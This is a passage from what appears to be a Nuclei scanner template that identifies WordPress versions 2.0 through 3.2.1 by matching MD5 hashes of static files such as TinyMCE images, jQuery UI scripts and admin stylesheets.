- - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/quicktime.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/shockwave.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/realmedia.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/trans.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flash.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/windowsmedia.gif" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flv_player.swf" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"fe011e9725b2722b59bb8ef4991bf6bb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/content.css" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"ebcad73e7f6785a308328129aa90d5cb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/blank.htm" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"f3519538055a4d1fdbe39fb84def65a5\" == md5(body))" - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"a35859a0902cbc290d6638823d50df88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screen-options-right.gif" - matchers: - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"44b706f5027137aa6d58a6226a4fecdc\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"ae671f7223fff3a47375d47a4bcf587f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/button-grad-active-vs.png" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"60f72449e40ee8a8d6bef4e8ed0260fd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/list-vs.png" - matchers: - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"978f0351d99a761bdafd313e76201be9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/button-grad-vs.png" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"c614f82ed58080d37618cc1839e4ce02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-arrow-vs.gif" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"a80771dd731c047e5dbbee8829163e82\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/visit-site-button-grad-vs.gif" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"4fd90308cccfc4fe131b07df35be96d4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-arrow-vs-rtl.gif" - matchers: - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"ac1697376f9765b1e8846f0601938243\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/visit-site-button-grad.gif" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"75e555e701dd658659474dfb3a70e851\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-top-vs.gif" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"0b16e5449ce8cd8fc7c7412f385e9edc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screen-options-right-up.gif" - matchers: - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"f645b789be33f81da8fdca5aedecc97e\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"745eebb21d33c943adbfea7bc6d37aa4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/fm.gif" - matchers: - - type: dsl - name: 2.5 - 3.1.4 - dsl: - - "(\"ac4a63cad5d195d24ec4c91121e9be2f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/sflogo.png" - matchers: - - type: dsl - name: 2.5 - 3.1.4 - dsl: - - "(\"18cbf7ea0ccc1d0aa42260aa9787af6f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/help.gif" - matchers: - - type: dsl - name: 2.5 - 3.1.4 - dsl: - - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more.gif" - matchers: - - type: dsl - name: 2.5 - 3.1.4 - dsl: - - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/toolbars.gif" - matchers: - - type: dsl - name: 2.5 - 3.1.4 - dsl: - - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/star.gif" - matchers: - - type: dsl - name: 2.7 - 3.1.4 - dsl: - - "(\"53b4445439bcf04aa36901548e379f12\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/logo-login.gif" - matchers: - - type: dsl - name: 2.7 - 3.1.4 - dsl: - - "(\"c62e03cf2e9417e6019657b3f5379802\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"47de928cafe74515a762f12a772c4823\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/list-table.dev.js" - matchers: - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b46a2638e88cb46acf8e49adb4622621\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/list-table.js" - matchers: - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"4ade95840705b173a03fc072e782ef9d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-rtl.png" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"6c1fbae84aab492cd1fff36c7f0e454d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/l10n.js" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"d64dc5dca841a048946621b935e540a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/l10n.dev.js" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"790e0e24a1f8061d75e8af6e4a8b6f9b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.draggable.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"58fe07c845c4146d80ce929bcaccecc1\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f1555bd3272ddfa24ce25de7090ceb21\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"e506c249ba3ba3bcf5468c4db2f1cd61\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"10f4e2da1843f09b7398217ce96402e2\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"151b6a710a60834b376d87dc81d38187\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.position.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"eda7e30312f7f5330fa88a1a9a1c31df\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a5fa42980074a99f53059597069d2077\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.core.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"4688f380b9e0021db778a38ca0f5df6f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"3d98d20c912618e3519321a81d5829b0\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"73359044f78d5055ce92d835f71ca8bc\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"77081f376fc4bc59694d88000fba7c3c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"f4618e213871a41e023e295367d932ce\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"04a74a9472b373a35d38d488259072dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.dialog.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"28c3ee6cd4928b4023a6efc0d0b0bd1f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"6cd7537598b6a62b1c49f7642ce20ea0\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"208575d150c2df5441725b768a5f8465\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"58e37a6a9905f9aa09170df90c5517e2\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"2810e7ba77f48226445fe67f00e0278c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.widget.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"5a2daaad606706ff30162cd91f4e52ae\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"0627e92c9275c569f8eb69485f91600f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.tabs.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"087072e535830ca3ba52af113a14f1c7\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f1ec6bf7c91dba53f793c4e0b00b5b43\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"60baf0f868b3817860daede9d99266b3\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"92321373c9dcad8d096abd76ba18c02d\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"db82282a162891af35802d19093f32d2\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"714e864501b632b248ad4653f942b433\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"79ba03ebbddfe85f3bab511b653426a6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.mouse.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"20b9fd26e3ca272b473511601b7604d9\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b8cc842248a8e9f6ab905db47919ce91\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.selectable.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9fe50669ab990a4b530d32cff4ec1269\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"778423eb2b5ec020eb01470c17c2d242\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"0590a2173096ae62a72f829988167ce9\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"bcb1ae0fac5fa2d18aa6b36ab65c59d3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.resizable.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1c7ac560b262e562dec64427d6b6551a\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"840edcdd83bd4b13b7f511cde103e2d3\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"44d86a9737e5214b713042621529aec1\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"5c04b89c0237cb4408d364b38d0888a2\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"11498ad77b63b676cabf446da36be84c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.sortable.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"2694e10af5cbfbbcd54c76c72927cb4d\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"ee4315bdb09d4327d7c6144fc620a1eb\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"70425b8b665ce7069e2d3d2274a18302\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"8b26b1568a703a7ff4cc4653b4982c0a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"bed2e54175ca63cc0bec8a864831986f\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"ec1c962315b17de67bc40ff55b406063\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.button.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"7a293a0579a93cba3d1d06560b48e890\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"2e2303a422d6df8392601fe69fb33e90\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui.droppable.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"3c8749db46671da792bbdf1b4827110f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"3ec22af31cb8d288bc930bae1540a9bf\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"9c34826f6918d94f8e2d0e92f8a603a2\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"422b880abd2de6c562ce1956ed6ba842\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/separator.gif" - matchers: - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/down_arrow.gif" - matchers: - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/fade-butt.png" - matchers: - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/button_bg.png" - matchers: - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/butt2.png" - matchers: - - type: dsl - name: 2.7 - 3.2.1 - dsl: - - "(\"f8177b2875cc2f1988f3a8645edfddb8\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"8063404a9759063d641ebfa8247b42fb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/wpicons.png" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/img/toggle-arrow.png" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"e5064769584f17a701131db269226700\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"6898c9d2f70705ee44ade16b719bdec7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"82c0f4232973144f8ead47babec37954\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink-rtl.dev.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"71c5a295547703474a311da1fb8a5375\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/css/wplink.dev.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"b98b951d96fa73562fecd5ddae985765\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"df344323225092a8ac4fe18dd3aadda9\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"8ca64ed1952868df64573291d7510e24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/js/wplink.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a2cf78fd7dbfe9f0ddfd5416a8d41a96\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"3b3d8b1cf11181517c34f9e99bf272d3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"29d1cde9c4907a89660c0f97dbbdbc7b\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"3ad85ded601480becdacc5b37d051a7d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-editor.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"f9b9af32ed5955188b95884c23a97710\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"08e782d86bb604d248af760965c44f9d\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"19af75a47678407c01b7bd89b514c382\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/plugin-install.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"e027ddfda419b05633c45aacd35d2792\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c93baaf77ab530218abdfb9d30bbb42f\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"0e3febdb81a87285c18b37f9ca01e63a\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a3e3c3795fd7fd526c86a8f2fb82e7b4\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"feff33da67f435d20eab953db34d0c63\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login-rtl.dev.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"b26a9eb0910662acf803506350ddfd9e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-install-rtl.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"994b061f1d4ef82fe4dda82e887fdebd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-install-rtl.dev.css" - matchers: - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"79d3545aa4f635d3149694e840aa313e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install-rtl.dev.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"fd87273191560d2a4909d5a451e85223\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menu-rtl.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"d21087ddbbd66002089743c75b3e9333\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"9c89cdcb450005439bfd953bc41d7650\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.dev.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"e215ec4d06602d4ab70f906aec41a9ad\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f0745260a97915cdee9e8964521ba987\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"b379a4aab078c4970c9b387cc8ccf77a\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"74e3bc0961e42685a1b2918ee21de19f\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"cb467b50c6b9c2151d5767c3df8d56aa\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"f167446b6210eda62f730de80f2af755\" == md5(body))" - - type: dsl - name: 2.5 - 2.6 - dsl: - - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"104436a986b68884830b4fecf3fa3188\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"4844a6a0a6e0c14348b6987cf5ac1072\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"b1e23cf91b326d5c4bfb1eb2bc5395cb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1032cbfcb279aff5069a3cc244d633a3\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"982751a4c494ed304013a96bc8e34711\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"eee458d5eaf8a119e8543f311b3b77ed\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"9626c77e24ce9dac516acb7871b1d5d3\" == md5(body))" - - type: dsl - name: 2.5 - 2.6 - dsl: - - "(\"fa538e7d2c3f867083940fe5ac32a9b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ms.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"bb8bd3b3f13e4ff26845a4a8f4f1a08d\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b8dc31acbc73acb7349c56086424a474\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"b8ba7a732b6bf241fcbcdfec837f9356\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-fresh-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"4f9b48f621aeca56c45251b2e2d5617c\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"753a209aebc4de7802fe343880137ef6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-install.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"80ae5e0c796d5c27bada602b1bc75250\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"de44af67c75286108f1c54f03e658c4f\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"3203506a8b4bba0e83b097c3fc898bf9\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.dev.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-classic-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"e97820effedd99f04729313203cc6a86\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a952db631dae4e612bb2d4a776920e34\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"3b3df59dfdf298205b1df4f696aa1ef7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ms.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c471baf72aebed568505b44ba5a67b6e\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"345810a7e7c3119897bc4c50c26ef511\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"a3d224255ce340dc53f9fc3d61d17250\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/plugin-install.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"cd13af37f71a04a7377f9f068b40897b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c65c2422ca7ab18d77e4253e6561d257\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"e39dd2d59cce29b66eaa73ae84f9eda4\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"b65dd37fb61228ea9b035aee471d0cdd\" == md5(body))" - - type: dsl - name: 2.8.3 - 2.8.6 - dsl: - - "(\"48705f886f1714e4c4c130e5fa7443f8\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.2 - dsl: - - "(\"f7d487f7084a44abbb9c73956cfff128\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"ecc45e15b82d9ba24fc97a649d2c3a1a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menu.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"18de21bea2d949abecd1505d54f8c592\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"44c3a17e3475319c2607dc5961d65240\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"47929d6248ad91217aa50432e8073fd3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"164ea0d8f1aeab1804d96101038bdc5f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"7c8a0c3eae1fe26740f3bb883104dd41\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"3887de3f53f64e803efd5291040c4db1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-install.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"ead37a72366af126a95f6cc0222650d0\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"540967968ab10e20a3ccd1c24a59a891\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"db9fd0a12bc515842828b62ad6c58117\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"96ccb208109e6bd91bb186d3945b712c\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"caca2d1c6d7f70138a2cae7cff992f9c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/plugin-install-rtl.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"bb15b10df11592f3c1e803132e07dde8\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"ff2cc41b3ec965996608fc6a416c0d34\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menu.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - 